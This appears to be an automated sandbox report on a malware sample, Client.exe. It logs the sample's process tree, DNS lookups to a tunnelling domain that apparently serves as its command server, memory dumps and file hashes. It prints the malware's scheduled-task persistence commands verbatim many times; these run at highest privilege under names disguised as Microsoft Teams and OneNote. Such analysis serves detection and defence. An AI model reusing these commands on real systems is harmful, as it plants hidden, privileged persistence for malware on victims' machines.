PID 4204 wrote to memory of 3348 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1036 wrote to memory of 1584 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1036 wrote to memory of 1584 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 4876 wrote to memory of 4880 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 3268 wrote to memory of 4464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 3268 wrote to memory of 4464 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1368 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1368 wrote to memory of 4004 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1368 wrote to memory of 4004 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 2644 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 2644 wrote to memory of 1280 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\CMD.exe
PID 1280 wrote to memory of 1108 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe
PID 1280 wrote to memory of 1108 N/A C:\Windows\SYSTEM32\CMD.exe C:\Windows\system32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Teams Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "OBS Studio" /tr "C:\Users\Admin\AppData\Local\xdwdGreenshot.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote Host" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\xdwdMicrosoft Azure DevOps.exe" /RL HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
IE 52.111.236.22:443 tcp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp
US 8.8.8.8:53 mature-viewers.gl.at.ply.gg udp

Files

memory/2644-0-0x0000000000AB0000-0x0000000000B08000-memory.dmp

memory/2644-1-0x00007FFF21033000-0x00007FFF21035000-memory.dmp

memory/2644-19-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp

C:\Windows\xdwd.dll

MD5 16e5a492c9c6ae34c59683be9c51fa31
SHA1 97031b41f5c56f371c28ae0d62a2df7d585adaba
SHA256 35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66
SHA512 20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

memory/2644-196-0x00007FFF21030000-0x00007FFF21AF2000-memory.dmp